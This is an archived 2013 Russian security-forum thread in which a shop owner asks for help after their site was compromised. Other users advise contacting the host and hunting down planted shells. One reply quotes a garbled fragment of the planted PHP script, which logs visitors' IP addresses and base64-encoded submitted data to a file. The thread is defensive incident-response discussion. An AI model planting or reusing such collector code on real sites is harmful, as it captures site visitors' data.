ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
17.01.2013, 04:05
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 3
Провел на форуме:
56774
Репутация:
0
|
|
Привет народ, снедавних пор на моем сайте стали проиходить чудеса. Появляется скрипт с содержанием:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Так вот я вроде всё делал как на любимом форуме написано, все данные внешние перед запросом обрабатывал функцией mysql_real_escape_string, где переменная цифровая проверял цифровая ли она и тп, а получается есть sqlinj.
Друзья, как быть?
То просто фаил появлялся, а теперь htaccess ставится редирект на какойто ГС... |
|
|
17.01.2013, 05:38
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Может проблема не в Вас в соседе который тоже находится на этом сервере? Обратитесь с проблемой к хостингу провайдеру. Пусть они проверят логи, откуда, что и куда...
|
|
|
|
17.01.2013, 11:51
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Аж греют душу такие сообщения =))))))))))))))))))) (Гомерический хохот за кадром)
|
|
|
|
17.01.2013, 12:13
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 3
Провел на форуме:
56774
Репутация:
0
|
|
cat1vo, Да вот дело в том что логи предоставляются, а в них грамота филькина. Вроде как во мне причина...
Cennarios, есть замечательный русские поговорки про радость чужим неудачам...
|
|
|
|
17.01.2013, 12:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
ТС, убирай этот код, закрывай дыры, ищи среди файлов шеллы, а также минишеллы записанные среди кода твоих основных файлов, прост посмотри какие в последнийраз менялись и быстро найдёшь
|
|
|
|
17.01.2013, 12:39
|
|
Познающий
Регистрация: 22.10.2009
Сообщений: 72
Провел на форуме:
861032
Репутация:
24
|
|
Что за проект?=)
|
|
|
|
17.01.2013, 12:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
12610
Репутация:
0
|
|
дай ссылку на этот файл, посмотрим
|
|
|
|
17.01.2013, 14:05
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 3
Провел на форуме:
56774
Репутация:
0
|
|
qaz, так могли дату обновления подменить)
Минишел - это запрос к текстовому фаилу с последущей генерацией на сервере шела?)
cLauZ, интернет-магазин
йож, так содержание фаила выложено.
Предоставили мне логи, а там жесть какаято. Щас буду учиться читать логи. Но как я понимаю фаила с дырой мне не скажут логи?)
|
|
|
|
17.01.2013, 23:02
|
|
Новичок
Регистрация: 25.01.2009
Сообщений: 1
Провел на форуме:
4954
Репутация:
0
|
|
Сообщение от Asbury
Asbury said:
Появляется скрипт с содержанием:
вот если надо, чё там внутри...
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) print[/COLOR][COLOR="#DD0000"]'STATUS-IMPORT-OK'[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]) >[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]=@[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'tmpfile'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]flock[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]LOCK_EX[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]fputs[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REMOTE_ADDR'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"\t"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]base64_encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]flock[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]LOCK_UN[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]);
}
}
exit;
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
|
|
|
|
18.01.2013, 02:05
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 3
Провел на форуме:
56774
Репутация:
0
|
|
могу ли я запись:
Tue Nov 06 18:36:02 2012 0 ::ffff:65.254.224.34 3040 /home/users1/a/user_name/default.php b _ i r юзер ftp 0 * c
интерпретировать, как косяк со стороны хостинга?!
Получается что фаил был внезапно скачан в корневую директорию ftp, а не в один из сайтов на ftp, за которые спрос был бы с меня?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
